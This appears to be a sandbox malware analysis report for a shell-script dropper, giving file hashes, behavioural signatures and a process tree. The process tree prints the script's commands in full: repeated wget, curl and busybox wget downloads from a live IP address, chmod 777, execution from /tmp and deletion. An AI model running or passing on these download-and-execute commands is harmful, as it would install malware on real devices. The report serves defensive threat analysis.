Analysis
-
max time kernel
61s -
max time network
59s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
28/10/2024, 02:04
Static task
static1
Behavioral task
behavioral1
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
-
Size
10KB
-
MD5
8831ac149f5712a653b2ed7d4a827e57
-
SHA1
e48119cbe7dcbf516620e6b82c96350ecb491554
-
SHA256
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd
-
SHA512
368cdcd017b026288093ca2a837a48c67cee319efbe80778a1a7c80f7206446b4944f3ade0ba0e8bfa35bc140fc293621629cd99e3e8e54e7226c2598122500f
-
SSDEEP
96:HMMfw0o7MQoiYo7XjoP3uZJs/CqDyu7hlQdddimXhGXhaXh+WXhyXhCXhnEQyhlT:MAmyjhlQdddiGmSHqaGhlQddtmSHqalu
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh/tmp/0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh1⤵PID:713
-
/bin/rm/bin/rm bins.sh2⤵PID:722
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:725
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:743
-
-
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:748
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:749
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:751
-
-
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:754
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:755
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:757
-
-
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
PID:759
-
-
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:760
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:761
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:769
-
-
/bin/chmodchmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Executes dropped EXE
PID:775
-
-
/bin/rmrm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:777
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:779
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:784
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:793
-
-
/bin/chmodchmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Executes dropped EXE
PID:799
-
-
/bin/rmrm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:802
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:803
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:819
-
-
/bin/chmodchmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:823
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:824
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:826
-
-
/bin/chmodchmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:829
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:830
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:832
-
-
/bin/chmodchmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:841
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:842
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:870
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:877
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:880
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:883
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:889
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:895
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:901
-
-
/bin/chmodchmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:907
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:913
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:919
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:925
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:929
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:931
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:934
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:937
-
-
/bin/chmodchmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:940
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:941
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:943
-
-
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:946
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:947
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:949
-
-
/bin/chmodchmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:952
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:953
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:955
-
-
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:961
-
-
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:967
-
-
/bin/chmodchmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:970
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:971
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:973
-
-
/bin/chmodchmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:976
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:977
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:979
-
-
/bin/chmodchmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:982
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:983
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:985
-
-
/bin/chmodchmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:988
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97